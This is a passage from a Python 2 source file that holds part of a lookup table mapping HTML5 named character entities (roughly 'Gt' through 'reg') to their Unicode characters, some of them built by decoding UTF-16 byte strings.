u'Gt': u'\u226b',
u'gtcc': u'\u2aa7',
u'gtcir': u'\u2a7a',
u'gtdot': u'\u22d7',
u'gtlPar': u'\u2995',
u'gtquest': u'\u2a7c',
u'gtrapprox': u'\u2a86',
u'gtrarr': u'\u2978',
u'gtrdot': u'\u22d7',
u'gtreqless': u'\u22db',
u'gtreqqless': u'\u2a8c',
u'gtrless': u'\u2277',
u'gtrsim': u'\u2273',
u'gvertneqq': u'\u2269\ufe00',
u'gvnE': u'\u2269\ufe00',
u'Hacek': u'\u02c7',
u'hairsp': u'\u200a',
u'half': u'\xbd',
u'hamilt': u'\u210b',
u'HARDcy': u'\u042a',
u'hardcy': u'\u044a',
u'hArr': u'\u21d4',
u'harr': u'\u2194',
u'harrcir': u'\u2948',
u'harrw': u'\u21ad',
u'Hat': u'^',
u'hbar': u'\u210f',
u'Hcirc': u'\u0124',
u'hcirc': u'\u0125',
u'hearts': u'\u2665',
u'heartsuit': u'\u2665',
u'hellip': u'\u2026',
u'hercon': u'\u22b9',
u'Hfr': u'\u210c',
u'hfr': '5\xd8%\xdd'.decode("utf-16-le"),
u'HilbertSpace': u'\u210b',
u'hksearow': u'\u2925',
u'hkswarow': u'\u2926',
u'hoarr': u'\u21ff',
u'homtht': u'\u223b',
u'hookleftarrow': u'\u21a9',
u'hookrightarrow': u'\u21aa',
u'Hopf': u'\u210d',
u'hopf': '5\xd8Y\xdd'.decode("utf-16-le"),
u'horbar': u'\u2015',
u'HorizontalLine': u'\u2500',
u'Hscr': u'\u210b',
u'hscr': '5\xd8\xbd\xdc'.decode("utf-16-le"),
u'hslash': u'\u210f',
u'Hstrok': u'\u0126',
u'hstrok': u'\u0127',
u'HumpDownHump': u'\u224e',
u'HumpEqual': u'\u224f',
u'hybull': u'\u2043',
u'hyphen': u'\u2010',
u'Iacute': u'\xcd',
u'iacute': u'\xed',
u'ic': u'\u2063',
u'Icirc': u'\xce',
u'icirc': u'\xee',
u'Icy': u'\u0418',
u'icy': u'\u0438',
u'Idot': u'\u0130',
u'IEcy': u'\u0415',
u'iecy': u'\u0435',
u'iexcl': u'\xa1',
u'iff': u'\u21d4',
u'Ifr': u'\u2111',
u'ifr': '5\xd8&\xdd'.decode("utf-16-le"),
u'Igrave': u'\xcc',
u'igrave': u'\xec',
u'ii': u'\u2148',
u'iiiint': u'\u2a0c',
u'iiint': u'\u222d',
u'iinfin': u'\u29dc',
u'iiota': u'\u2129',
u'IJlig': u'\u0132',
u'ijlig': u'\u0133',
u'Im': u'\u2111',
u'Imacr': u'\u012a',
u'imacr': u'\u012b',
u'image': u'\u2111',
u'ImaginaryI': u'\u2148',
u'imagline': u'\u2110',
u'imagpart': u'\u2111',
u'imath': u'\u0131',
u'imof': u'\u22b7',
u'imped': u'\u01b5',
u'Implies': u'\u21d2',
u'in': u'\u2208',
u'incare': u'\u2105',
u'infin': u'\u221e',
u'infintie': u'\u29dd',
u'inodot': u'\u0131',
u'Int': u'\u222c',
u'int': u'\u222b',
u'intcal': u'\u22ba',
u'integers': u'\u2124',
u'Integral': u'\u222b',
u'intercal': u'\u22ba',
u'Intersection': u'\u22c2',
u'intlarhk': u'\u2a17',
u'intprod': u'\u2a3c',
u'InvisibleComma': u'\u2063',
u'InvisibleTimes': u'\u2062',
u'IOcy': u'\u0401',
u'iocy': u'\u0451',
u'Iogon': u'\u012e',
u'iogon': u'\u012f',
u'Iopf': '5\xd8@\xdd'.decode("utf-16-le"),
u'iopf': '5\xd8Z\xdd'.decode("utf-16-le"),
u'Iota': u'\u0399',
u'iota': u'\u03b9',
u'iprod': u'\u2a3c',
u'iquest': u'\xbf',
u'Iscr': u'\u2110',
u'iscr': '5\xd8\xbe\xdc'.decode("utf-16-le"),
u'isin': u'\u2208',
u'isindot': u'\u22f5',
u'isinE': u'\u22f9',
u'isins': u'\u22f4',
u'isinsv': u'\u22f3',
u'isinv': u'\u2208',
u'it': u'\u2062',
u'Itilde': u'\u0128',
u'itilde': u'\u0129',
u'Iukcy': u'\u0406',
u'iukcy': u'\u0456',
u'Iuml': u'\xcf',
u'iuml': u'\xef',
u'Jcirc': u'\u0134',
u'jcirc': u'\u0135',
u'Jcy': u'\u0419',
u'jcy': u'\u0439',
u'Jfr': '5\xd8\r\xdd'.decode("utf-16-le"),
u'jfr': '5\xd8\'\xdd'.decode("utf-16-le"),
u'jmath': u'\u0237',
u'Jopf': '5\xd8A\xdd'.decode("utf-16-le"),
u'jopf': '5\xd8[\xdd'.decode("utf-16-le"),
u'Jscr': '5\xd8\xa5\xdc'.decode("utf-16-le"),
u'jscr': '5\xd8\xbf\xdc'.decode("utf-16-le"),
u'Jsercy': u'\u0408',
u'jsercy': u'\u0458',
u'Jukcy': u'\u0404',
u'jukcy': u'\u0454',
u'Kappa': u'\u039a',
u'kappa': u'\u03ba',
u'kappav': u'\u03f0',
u'Kcedil': u'\u0136',
u'kcedil': u'\u0137',
u'Kcy': u'\u041a',
u'kcy': u'\u043a',
u'Kfr': '5\xd8\x0e\xdd'.decode("utf-16-le"),
u'kfr': '5\xd8(\xdd'.decode("utf-16-le"),
u'kgreen': u'\u0138',
u'KHcy': u'\u0425',
u'khcy': u'\u0445',
u'KJcy': u'\u040c',
u'kjcy': u'\u045c',
u'Kopf': '5\xd8B\xdd'.decode("utf-16-le"),
u'kopf': '5\xd8\\\xdd'.decode("utf-16-le"),
u'Kscr': '5\xd8\xa6\xdc'.decode("utf-16-le"),
u'kscr': '5\xd8\xc0\xdc'.decode("utf-16-le"),
u'lAarr': u'\u21da',
u'Lacute': u'\u0139',
u'lacute': u'\u013a',
u'laemptyv': u'\u29b4',
u'lagran': u'\u2112',
u'Lambda': u'\u039b',
u'lambda': u'\u03bb',
u'Lang': u'\u27ea',
u'lang': u'\u27e8',
u'langd': u'\u2991',
u'langle': u'\u27e8',
u'lap': u'\u2a85',
u'Laplacetrf': u'\u2112',
u'laquo': u'\xab',
u'Larr': u'\u219e',
u'lArr': u'\u21d0',
u'larr': u'\u2190',
u'larrb': u'\u21e4',
u'larrbfs': u'\u291f',
u'larrfs': u'\u291d',
u'larrhk': u'\u21a9',
u'larrlp': u'\u21ab',
u'larrpl': u'\u2939',
u'larrsim': u'\u2973',
u'larrtl': u'\u21a2',
u'lat': u'\u2aab',
u'lAtail': u'\u291b',
u'latail': u'\u2919',
u'late': u'\u2aad',
u'lates': u'\u2aad\ufe00',
u'lBarr': u'\u290e',
u'lbarr': u'\u290c',
u'lbbrk': u'\u2772',
u'lbrace': u'{',
u'lbrack': u'[',
u'lbrke': u'\u298b',
u'lbrksld': u'\u298f',
u'lbrkslu': u'\u298d',
u'Lcaron': u'\u013d',
u'lcaron': u'\u013e',
u'Lcedil': u'\u013b',
u'lcedil': u'\u013c',
u'lceil': u'\u2308',
u'lcub': u'{',
u'Lcy': u'\u041b',
u'lcy': u'\u043b',
u'ldca': u'\u2936',
u'ldquo': u'\u201c',
u'ldquor': u'\u201e',
u'ldrdhar': u'\u2967',
u'ldrushar': u'\u294b',
u'ldsh': u'\u21b2',
u'lE': u'\u2266',
u'le': u'\u2264',
u'LeftAngleBracket': u'\u27e8',
u'LeftArrow': u'\u2190',
u'Leftarrow': u'\u21d0',
u'leftarrow': u'\u2190',
u'LeftArrowBar': u'\u21e4',
u'LeftArrowRightArrow': u'\u21c6',
u'leftarrowtail': u'\u21a2',
u'LeftCeiling': u'\u2308',
u'LeftDoubleBracket': u'\u27e6',
u'LeftDownTeeVector': u'\u2961',
u'LeftDownVector': u'\u21c3',
u'LeftDownVectorBar': u'\u2959',
u'LeftFloor': u'\u230a',
u'leftharpoondown': u'\u21bd',
u'leftharpoonup': u'\u21bc',
u'leftleftarrows': u'\u21c7',
u'LeftRightArrow': u'\u2194',
u'Leftrightarrow': u'\u21d4',
u'leftrightarrow': u'\u2194',
u'leftrightarrows': u'\u21c6',
u'leftrightharpoons': u'\u21cb',
u'leftrightsquigarrow': u'\u21ad',
u'LeftRightVector': u'\u294e',
u'LeftTee': u'\u22a3',
u'LeftTeeArrow': u'\u21a4',
u'LeftTeeVector': u'\u295a',
u'leftthreetimes': u'\u22cb',
u'LeftTriangle': u'\u22b2',
u'LeftTriangleBar': u'\u29cf',
u'LeftTriangleEqual': u'\u22b4',
u'LeftUpDownVector': u'\u2951',
u'LeftUpTeeVector': u'\u2960',
u'LeftUpVector': u'\u21bf',
u'LeftUpVectorBar': u'\u2958',
u'LeftVector': u'\u21bc',
u'LeftVectorBar': u'\u2952',
u'lEg': u'\u2a8b',
u'leg': u'\u22da',
u'leq': u'\u2264',
u'leqq': u'\u2266',
u'leqslant': u'\u2a7d',
u'les': u'\u2a7d',
u'lescc': u'\u2aa8',
u'lesdot': u'\u2a7f',
u'lesdoto': u'\u2a81',
u'lesdotor': u'\u2a83',
u'lesg': u'\u22da\ufe00',
u'lesges': u'\u2a93',
u'lessapprox': u'\u2a85',
u'lessdot': u'\u22d6',
u'lesseqgtr': u'\u22da',
u'lesseqqgtr': u'\u2a8b',
u'LessEqualGreater': u'\u22da',
u'LessFullEqual': u'\u2266',
u'LessGreater': u'\u2276',
u'lessgtr': u'\u2276',
u'LessLess': u'\u2aa1',
u'lesssim': u'\u2272',
u'LessSlantEqual': u'\u2a7d',
u'LessTilde': u'\u2272',
u'lfisht': u'\u297c',
u'lfloor': u'\u230a',
u'Lfr': '5\xd8\x0f\xdd'.decode("utf-16-le"),
u'lfr': '5\xd8)\xdd'.decode("utf-16-le"),
u'lg': u'\u2276',
u'lgE': u'\u2a91',
u'lHar': u'\u2962',
u'lhard': u'\u21bd',
u'lharu': u'\u21bc',
u'lharul': u'\u296a',
u'lhblk': u'\u2584',
u'LJcy': u'\u0409',
u'ljcy': u'\u0459',
u'Ll': u'\u22d8',
u'll': u'\u226a',
u'llarr': u'\u21c7',
u'llcorner': u'\u231e',
u'Lleftarrow': u'\u21da',
u'llhard': u'\u296b',
u'lltri': u'\u25fa',
u'Lmidot': u'\u013f',
u'lmidot': u'\u0140',
u'lmoust': u'\u23b0',
u'lmoustache': u'\u23b0',
u'lnap': u'\u2a89',
u'lnapprox': u'\u2a89',
u'lnE': u'\u2268',
u'lne': u'\u2a87',
u'lneq': u'\u2a87',
u'lneqq': u'\u2268',
u'lnsim': u'\u22e6',
u'loang': u'\u27ec',
u'loarr': u'\u21fd',
u'lobrk': u'\u27e6',
u'LongLeftArrow': u'\u27f5',
u'Longleftarrow': u'\u27f8',
u'longleftarrow': u'\u27f5',
u'LongLeftRightArrow': u'\u27f7',
u'Longleftrightarrow': u'\u27fa',
u'longleftrightarrow': u'\u27f7',
u'longmapsto': u'\u27fc',
u'LongRightArrow': u'\u27f6',
u'Longrightarrow': u'\u27f9',
u'longrightarrow': u'\u27f6',
u'looparrowleft': u'\u21ab',
u'looparrowright': u'\u21ac',
u'lopar': u'\u2985',
u'Lopf': '5\xd8C\xdd'.decode("utf-16-le"),
u'lopf': '5\xd8]\xdd'.decode("utf-16-le"),
u'loplus': u'\u2a2d',
u'lotimes': u'\u2a34',
u'lowast': u'\u2217',
u'lowbar': u'_',
u'LowerLeftArrow': u'\u2199',
u'LowerRightArrow': u'\u2198',
u'loz': u'\u25ca',
u'lozenge': u'\u25ca',
u'lozf': u'\u29eb',
u'lpar': u'(',
u'lparlt': u'\u2993',
u'lrarr': u'\u21c6',
u'lrcorner': u'\u231f',
u'lrhar': u'\u21cb',
u'lrhard': u'\u296d',
u'lrm': u'\u200e',
u'lrtri': u'\u22bf',
u'lsaquo': u'\u2039',
u'Lscr': u'\u2112',
u'lscr': '5\xd8\xc1\xdc'.decode("utf-16-le"),
u'Lsh': u'\u21b0',
u'lsh': u'\u21b0',
u'lsim': u'\u2272',
u'lsime': u'\u2a8d',
u'lsimg': u'\u2a8f',
u'lsqb': u'[',
u'lsquo': u'\u2018',
u'lsquor': u'\u201a',
u'Lstrok': u'\u0141',
u'lstrok': u'\u0142',
u'LT': u'<',
u'lt': u'<',
u'Lt': u'\u226a',
u'ltcc': u'\u2aa6',
u'ltcir': u'\u2a79',
u'ltdot': u'\u22d6',
u'lthree': u'\u22cb',
u'ltimes': u'\u22c9',
u'ltlarr': u'\u2976',
u'ltquest': u'\u2a7b',
u'ltri': u'\u25c3',
u'ltrie': u'\u22b4',
u'ltrif': u'\u25c2',
u'ltrPar': u'\u2996',
u'lurdshar': u'\u294a',
u'luruhar': u'\u2966',
u'lvertneqq': u'\u2268\ufe00',
u'lvnE': u'\u2268\ufe00',
u'macr': u'\xaf',
u'male': u'\u2642',
u'malt': u'\u2720',
u'maltese': u'\u2720',
u'Map': u'\u2905',
u'map': u'\u21a6',
u'mapsto': u'\u21a6',
u'mapstodown': u'\u21a7',
u'mapstoleft': u'\u21a4',
u'mapstoup': u'\u21a5',
u'marker': u'\u25ae',
u'mcomma': u'\u2a29',
u'Mcy': u'\u041c',
u'mcy': u'\u043c',
u'mdash': u'\u2014',
u'mDDot': u'\u223a',
u'measuredangle': u'\u2221',
u'MediumSpace': u'\u205f',
u'Mellintrf': u'\u2133',
u'Mfr': '5\xd8\x10\xdd'.decode("utf-16-le"),
u'mfr': '5\xd8*\xdd'.decode("utf-16-le"),
u'mho': u'\u2127',
u'micro': u'\xb5',
u'mid': u'\u2223',
u'midast': u'*',
u'midcir': u'\u2af0',
u'middot': u'\xb7',
u'minus': u'\u2212',
u'minusb': u'\u229f',
u'minusd': u'\u2238',
u'minusdu': u'\u2a2a',
u'MinusPlus': u'\u2213',
u'mlcp': u'\u2adb',
u'mldr': u'\u2026',
u'mnplus': u'\u2213',
u'models': u'\u22a7',
u'Mopf': '5\xd8D\xdd'.decode("utf-16-le"),
u'mopf': '5\xd8^\xdd'.decode("utf-16-le"),
u'mp': u'\u2213',
u'Mscr': u'\u2133',
u'mscr': '5\xd8\xc2\xdc'.decode("utf-16-le"),
u'mstpos': u'\u223e',
u'Mu': u'\u039c',
u'mu': u'\u03bc',
u'multimap': u'\u22b8',
u'mumap': u'\u22b8',
u'nabla': u'\u2207',
u'Nacute': u'\u0143',
u'nacute': u'\u0144',
u'nang': u'\u2220\u20d2',
u'nap': u'\u2249',
u'napE': u'\u2a70\u0338',
u'napid': u'\u224b\u0338',
u'napos': u'\u0149',
u'napprox': u'\u2249',
u'natur': u'\u266e',
u'natural': u'\u266e',
u'naturals': u'\u2115',
u'nbsp': u'\xa0',
u'nbump': u'\u224e\u0338',
u'nbumpe': u'\u224f\u0338',
u'ncap': u'\u2a43',
u'Ncaron': u'\u0147',
u'ncaron': u'\u0148',
u'Ncedil': u'\u0145',
u'ncedil': u'\u0146',
u'ncong': u'\u2247',
u'ncongdot': u'\u2a6d\u0338',
u'ncup': u'\u2a42',
u'Ncy': u'\u041d',
u'ncy': u'\u043d',
u'ndash': u'\u2013',
u'ne': u'\u2260',
u'nearhk': u'\u2924',
u'neArr': u'\u21d7',
u'nearr': u'\u2197',
u'nearrow': u'\u2197',
u'nedot': u'\u2250\u0338',
u'NegativeMediumSpace': u'\u200b',
u'NegativeThickSpace': u'\u200b',
u'NegativeThinSpace': u'\u200b',
u'NegativeVeryThinSpace': u'\u200b',
u'nequiv': u'\u2262',
u'nesear': u'\u2928',
u'nesim': u'\u2242\u0338',
u'NestedGreaterGreater': u'\u226b',
u'NestedLessLess': u'\u226a',
u'NewLine': u'\n',
u'nexist': u'\u2204',
u'nexists': u'\u2204',
u'Nfr': '5\xd8\x11\xdd'.decode("utf-16-le"),
u'nfr': '5\xd8+\xdd'.decode("utf-16-le"),
u'ngE': u'\u2267\u0338',
u'nge': u'\u2271',
u'ngeq': u'\u2271',
u'ngeqq': u'\u2267\u0338',
u'ngeqslant': u'\u2a7e\u0338',
u'nges': u'\u2a7e\u0338',
u'nGg': u'\u22d9\u0338',
u'ngsim': u'\u2275',
u'nGt': u'\u226b\u20d2',
u'ngt': u'\u226f',
u'ngtr': u'\u226f',
u'nGtv': u'\u226b\u0338',
u'nhArr': u'\u21ce',
u'nharr': u'\u21ae',
u'nhpar': u'\u2af2',
u'ni': u'\u220b',
u'nis': u'\u22fc',
u'nisd': u'\u22fa',
u'niv': u'\u220b',
u'NJcy': u'\u040a',
u'njcy': u'\u045a',
u'nlArr': u'\u21cd',
u'nlarr': u'\u219a',
u'nldr': u'\u2025',
u'nlE': u'\u2266\u0338',
u'nle': u'\u2270',
u'nLeftarrow': u'\u21cd',
u'nleftarrow': u'\u219a',
u'nLeftrightarrow': u'\u21ce',
u'nleftrightarrow': u'\u21ae',
u'nleq': u'\u2270',
u'nleqq': u'\u2266\u0338',
u'nleqslant': u'\u2a7d\u0338',
u'nles': u'\u2a7d\u0338',
u'nless': u'\u226e',
u'nLl': u'\u22d8\u0338',
u'nlsim': u'\u2274',
u'nLt': u'\u226a\u20d2',
u'nlt': u'\u226e',
u'nltri': u'\u22ea',
u'nltrie': u'\u22ec',
u'nLtv': u'\u226a\u0338',
u'nmid': u'\u2224',
u'NoBreak': u'\u2060',
u'NonBreakingSpace': u'\xa0',
u'Nopf': u'\u2115',
u'nopf': '5\xd8_\xdd'.decode("utf-16-le"),
u'not': u'\xac',
u'Not': u'\u2aec',
u'NotCongruent': u'\u2262',
u'NotCupCap': u'\u226d',
u'NotDoubleVerticalBar': u'\u2226',
u'NotElement': u'\u2209',
u'NotEqual': u'\u2260',
u'NotEqualTilde': u'\u2242\u0338',
u'NotExists': u'\u2204',
u'NotGreater': u'\u226f',
u'NotGreaterEqual': u'\u2271',
u'NotGreaterFullEqual': u'\u2267\u0338',
u'NotGreaterGreater': u'\u226b\u0338',
u'NotGreaterLess': u'\u2279',
u'NotGreaterSlantEqual': u'\u2a7e\u0338',
u'NotGreaterTilde': u'\u2275',
u'NotHumpDownHump': u'\u224e\u0338',
u'NotHumpEqual': u'\u224f\u0338',
u'notin': u'\u2209',
u'notindot': u'\u22f5\u0338',
u'notinE': u'\u22f9\u0338',
u'notinva': u'\u2209',
u'notinvb': u'\u22f7',
u'notinvc': u'\u22f6',
u'NotLeftTriangle': u'\u22ea',
u'NotLeftTriangleBar': u'\u29cf\u0338',
u'NotLeftTriangleEqual': u'\u22ec',
u'NotLess': u'\u226e',
u'NotLessEqual': u'\u2270',
u'NotLessGreater': u'\u2278',
u'NotLessLess': u'\u226a\u0338',
u'NotLessSlantEqual': u'\u2a7d\u0338',
u'NotLessTilde': u'\u2274',
u'NotNestedGreaterGreater': u'\u2aa2\u0338',
u'NotNestedLessLess': u'\u2aa1\u0338',
u'notni': u'\u220c',
u'notniva': u'\u220c',
u'notnivb': u'\u22fe',
u'notnivc': u'\u22fd',
u'NotPrecedes': u'\u2280',
u'NotPrecedesEqual': u'\u2aaf\u0338',
u'NotPrecedesSlantEqual': u'\u22e0',
u'NotReverseElement': u'\u220c',
u'NotRightTriangle': u'\u22eb',
u'NotRightTriangleBar': u'\u29d0\u0338',
u'NotRightTriangleEqual': u'\u22ed',
u'NotSquareSubset': u'\u228f\u0338',
u'NotSquareSubsetEqual': u'\u22e2',
u'NotSquareSuperset': u'\u2290\u0338',
u'NotSquareSupersetEqual': u'\u22e3',
u'NotSubset': u'\u2282\u20d2',
u'NotSubsetEqual': u'\u2288',
u'NotSucceeds': u'\u2281',
u'NotSucceedsEqual': u'\u2ab0\u0338',
u'NotSucceedsSlantEqual': u'\u22e1',
u'NotSucceedsTilde': u'\u227f\u0338',
u'NotSuperset': u'\u2283\u20d2',
u'NotSupersetEqual': u'\u2289',
u'NotTilde': u'\u2241',
u'NotTildeEqual': u'\u2244',
u'NotTildeFullEqual': u'\u2247',
u'NotTildeTilde': u'\u2249',
u'NotVerticalBar': u'\u2224',
u'npar': u'\u2226',
u'nparallel': u'\u2226',
u'nparsl': u'\u2afd\u20e5',
u'npart': u'\u2202\u0338',
u'npolint': u'\u2a14',
u'npr': u'\u2280',
u'nprcue': u'\u22e0',
u'npre': u'\u2aaf\u0338',
u'nprec': u'\u2280',
u'npreceq': u'\u2aaf\u0338',
u'nrArr': u'\u21cf',
u'nrarr': u'\u219b',
u'nrarrc': u'\u2933\u0338',
u'nrarrw': u'\u219d\u0338',
u'nRightarrow': u'\u21cf',
u'nrightarrow': u'\u219b',
u'nrtri': u'\u22eb',
u'nrtrie': u'\u22ed',
u'nsc': u'\u2281',
u'nsccue': u'\u22e1',
u'nsce': u'\u2ab0\u0338',
u'Nscr': '5\xd8\xa9\xdc'.decode("utf-16-le"),
u'nscr': '5\xd8\xc3\xdc'.decode("utf-16-le"),
u'nshortmid': u'\u2224',
u'nshortparallel': u'\u2226',
u'nsim': u'\u2241',
u'nsime': u'\u2244',
u'nsimeq': u'\u2244',
u'nsmid': u'\u2224',
u'nspar': u'\u2226',
u'nsqsube': u'\u22e2',
u'nsqsupe': u'\u22e3',
u'nsub': u'\u2284',
u'nsubE': u'\u2ac5\u0338',
u'nsube': u'\u2288',
u'nsubset': u'\u2282\u20d2',
u'nsubseteq': u'\u2288',
u'nsubseteqq': u'\u2ac5\u0338',
u'nsucc': u'\u2281',
u'nsucceq': u'\u2ab0\u0338',
u'nsup': u'\u2285',
u'nsupE': u'\u2ac6\u0338',
u'nsupe': u'\u2289',
u'nsupset': u'\u2283\u20d2',
u'nsupseteq': u'\u2289',
u'nsupseteqq': u'\u2ac6\u0338',
u'ntgl': u'\u2279',
u'Ntilde': u'\xd1',
u'ntilde': u'\xf1',
u'ntlg': u'\u2278',
u'ntriangleleft': u'\u22ea',
u'ntrianglelefteq': u'\u22ec',
u'ntriangleright': u'\u22eb',
u'ntrianglerighteq': u'\u22ed',
u'Nu': u'\u039d',
u'nu': u'\u03bd',
u'num': u'#',
u'numero': u'\u2116',
u'numsp': u'\u2007',
u'nvap': u'\u224d\u20d2',
u'nVDash': u'\u22af',
u'nVdash': u'\u22ae',
u'nvDash': u'\u22ad',
u'nvdash': u'\u22ac',
u'nvge': u'\u2265\u20d2',
u'nvgt': u'>\u20d2',
u'nvHarr': u'\u2904',
u'nvinfin': u'\u29de',
u'nvlArr': u'\u2902',
u'nvle': u'\u2264\u20d2',
u'nvlt': u'<\u20d2',
u'nvltrie': u'\u22b4\u20d2',
u'nvrArr': u'\u2903',
u'nvrtrie': u'\u22b5\u20d2',
u'nvsim': u'\u223c\u20d2',
u'nwarhk': u'\u2923',
u'nwArr': u'\u21d6',
u'nwarr': u'\u2196',
u'nwarrow': u'\u2196',
u'nwnear': u'\u2927',
u'Oacute': u'\xd3',
u'oacute': u'\xf3',
u'oast': u'\u229b',
u'ocir': u'\u229a',
u'Ocirc': u'\xd4',
u'ocirc': u'\xf4',
u'Ocy': u'\u041e',
u'ocy': u'\u043e',
u'odash': u'\u229d',
u'Odblac': u'\u0150',
u'odblac': u'\u0151',
u'odiv': u'\u2a38',
u'odot': u'\u2299',
u'odsold': u'\u29bc',
u'OElig': u'\u0152',
u'oelig': u'\u0153',
u'ofcir': u'\u29bf',
u'Ofr': '5\xd8\x12\xdd'.decode("utf-16-le"),
u'ofr': '5\xd8,\xdd'.decode("utf-16-le"),
u'ogon': u'\u02db',
u'Ograve': u'\xd2',
u'ograve': u'\xf2',
u'ogt': u'\u29c1',
u'ohbar': u'\u29b5',
u'ohm': u'\u03a9',
u'oint': u'\u222e',
u'olarr': u'\u21ba',
u'olcir': u'\u29be',
u'olcross': u'\u29bb',
u'oline': u'\u203e',
u'olt': u'\u29c0',
u'Omacr': u'\u014c',
u'omacr': u'\u014d',
u'Omega': u'\u03a9',
u'omega': u'\u03c9',
u'Omicron': u'\u039f',
u'omicron': u'\u03bf',
u'omid': u'\u29b6',
u'ominus': u'\u2296',
u'Oopf': '5\xd8F\xdd'.decode("utf-16-le"),
u'oopf': '5\xd8`\xdd'.decode("utf-16-le"),
u'opar': u'\u29b7',
u'OpenCurlyDoubleQuote': u'\u201c',
u'OpenCurlyQuote': u'\u2018',
u'operp': u'\u29b9',
u'oplus': u'\u2295',
u'Or': u'\u2a54',
u'or': u'\u2228',
u'orarr': u'\u21bb',
u'ord': u'\u2a5d',
u'order': u'\u2134',
u'orderof': u'\u2134',
u'ordf': u'\xaa',
u'ordm': u'\xba',
u'origof': u'\u22b6',
u'oror': u'\u2a56',
u'orslope': u'\u2a57',
u'orv': u'\u2a5b',
u'oS': u'\u24c8',
u'Oscr': '5\xd8\xaa\xdc'.decode("utf-16-le"),
u'oscr': u'\u2134',
u'Oslash': u'\xd8',
u'oslash': u'\xf8',
u'osol': u'\u2298',
u'Otilde': u'\xd5',
u'otilde': u'\xf5',
u'Otimes': u'\u2a37',
u'otimes': u'\u2297',
u'otimesas': u'\u2a36',
u'Ouml': u'\xd6',
u'ouml': u'\xf6',
u'ovbar': u'\u233d',
u'OverBar': u'\u203e',
u'OverBrace': u'\u23de',
u'OverBracket': u'\u23b4',
u'OverParenthesis': u'\u23dc',
u'par': u'\u2225',
u'para': u'\xb6',
u'parallel': u'\u2225',
u'parsim': u'\u2af3',
u'parsl': u'\u2afd',
u'part': u'\u2202',
u'PartialD': u'\u2202',
u'Pcy': u'\u041f',
u'pcy': u'\u043f',
u'percnt': u'%',
u'period': u'.',
u'permil': u'\u2030',
u'perp': u'\u22a5',
u'pertenk': u'\u2031',
u'Pfr': '5\xd8\x13\xdd'.decode("utf-16-le"),
u'pfr': '5\xd8-\xdd'.decode("utf-16-le"),
u'Phi': u'\u03a6',
u'phi': u'\u03c6',
u'phiv': u'\u03d5',
u'phmmat': u'\u2133',
u'phone': u'\u260e',
u'Pi': u'\u03a0',
u'pi': u'\u03c0',
u'pitchfork': u'\u22d4',
u'piv': u'\u03d6',
u'planck': u'\u210f',
u'planckh': u'\u210e',
u'plankv': u'\u210f',
u'plus': u'+',
u'plusacir': u'\u2a23',
u'plusb': u'\u229e',
u'pluscir': u'\u2a22',
u'plusdo': u'\u2214',
u'plusdu': u'\u2a25',
u'pluse': u'\u2a72',
u'PlusMinus': u'\xb1',
u'plusmn': u'\xb1',
u'plussim': u'\u2a26',
u'plustwo': u'\u2a27',
u'pm': u'\xb1',
u'Poincareplane': u'\u210c',
u'pointint': u'\u2a15',
u'Popf': u'\u2119',
u'popf': '5\xd8a\xdd'.decode("utf-16-le"),
u'pound': u'\xa3',
u'Pr': u'\u2abb',
u'pr': u'\u227a',
u'prap': u'\u2ab7',
u'prcue': u'\u227c',
u'prE': u'\u2ab3',
u'pre': u'\u2aaf',
u'prec': u'\u227a',
u'precapprox': u'\u2ab7',
u'preccurlyeq': u'\u227c',
u'Precedes': u'\u227a',
u'PrecedesEqual': u'\u2aaf',
u'PrecedesSlantEqual': u'\u227c',
u'PrecedesTilde': u'\u227e',
u'preceq': u'\u2aaf',
u'precnapprox': u'\u2ab9',
u'precneqq': u'\u2ab5',
u'precnsim': u'\u22e8',
u'precsim': u'\u227e',
u'Prime': u'\u2033',
u'prime': u'\u2032',
u'primes': u'\u2119',
u'prnap': u'\u2ab9',
u'prnE': u'\u2ab5',
u'prnsim': u'\u22e8',
u'prod': u'\u220f',
u'Product': u'\u220f',
u'profalar': u'\u232e',
u'profline': u'\u2312',
u'profsurf': u'\u2313',
u'prop': u'\u221d',
u'Proportion': u'\u2237',
u'Proportional': u'\u221d',
u'propto': u'\u221d',
u'prsim': u'\u227e',
u'prurel': u'\u22b0',
u'Pscr': '5\xd8\xab\xdc'.decode("utf-16-le"),
u'pscr': '5\xd8\xc5\xdc'.decode("utf-16-le"),
u'Psi': u'\u03a8',
u'psi': u'\u03c8',
u'puncsp': u'\u2008',
u'Qfr': '5\xd8\x14\xdd'.decode("utf-16-le"),
u'qfr': '5\xd8.\xdd'.decode("utf-16-le"),
u'qint': u'\u2a0c',
u'Qopf': u'\u211a',
u'qopf': '5\xd8b\xdd'.decode("utf-16-le"),
u'qprime': u'\u2057',
u'Qscr': '5\xd8\xac\xdc'.decode("utf-16-le"),
u'qscr': '5\xd8\xc6\xdc'.decode("utf-16-le"),
u'quaternions': u'\u210d',
u'quatint': u'\u2a16',
u'quest': u'?',
u'questeq': u'\u225f',
u'QUOT': u'"',
u'quot': u'"',
u'rAarr': u'\u21db',
u'race': u'\u223d\u0331',
u'Racute': u'\u0154',
u'racute': u'\u0155',
u'radic': u'\u221a',
u'raemptyv': u'\u29b3',
u'Rang': u'\u27eb',
u'rang': u'\u27e9',
u'rangd': u'\u2992',
u'range': u'\u29a5',
u'rangle': u'\u27e9',
u'raquo': u'\xbb',
u'Rarr': u'\u21a0',
u'rArr': u'\u21d2',
u'rarr': u'\u2192',
u'rarrap': u'\u2975',
u'rarrb': u'\u21e5',
u'rarrbfs': u'\u2920',
u'rarrc': u'\u2933',
u'rarrfs': u'\u291e',
u'rarrhk': u'\u21aa',
u'rarrlp': u'\u21ac',
u'rarrpl': u'\u2945',
u'rarrsim': u'\u2974',
u'Rarrtl': u'\u2916',
u'rarrtl': u'\u21a3',
u'rarrw': u'\u219d',
u'rAtail': u'\u291c',
u'ratail': u'\u291a',
u'ratio': u'\u2236',
u'rationals': u'\u211a',
u'RBarr': u'\u2910',
u'rBarr': u'\u290f',
u'rbarr': u'\u290d',
u'rbbrk': u'\u2773',
u'rbrace': u'}',
u'rbrack': u']',
u'rbrke': u'\u298c',
u'rbrksld': u'\u298e',
u'rbrkslu': u'\u2990',
u'Rcaron': u'\u0158',
u'rcaron': u'\u0159',
u'Rcedil': u'\u0156',
u'rcedil': u'\u0157',
u'rceil': u'\u2309',
u'rcub': u'}',
u'Rcy': u'\u0420',
u'rcy': u'\u0440',
u'rdca': u'\u2937',
u'rdldhar': u'\u2969',
u'rdquo': u'\u201d',
u'rdquor': u'\u201d',
u'rdsh': u'\u21b3',
u'Re': u'\u211c',
u'real': u'\u211c',
u'realine': u'\u211b',
u'realpart': u'\u211c',
u'reals': u'\u211d',
u'rect': u'\u25ad',
u'REG': u'\xae',
u'reg': u'\xae',
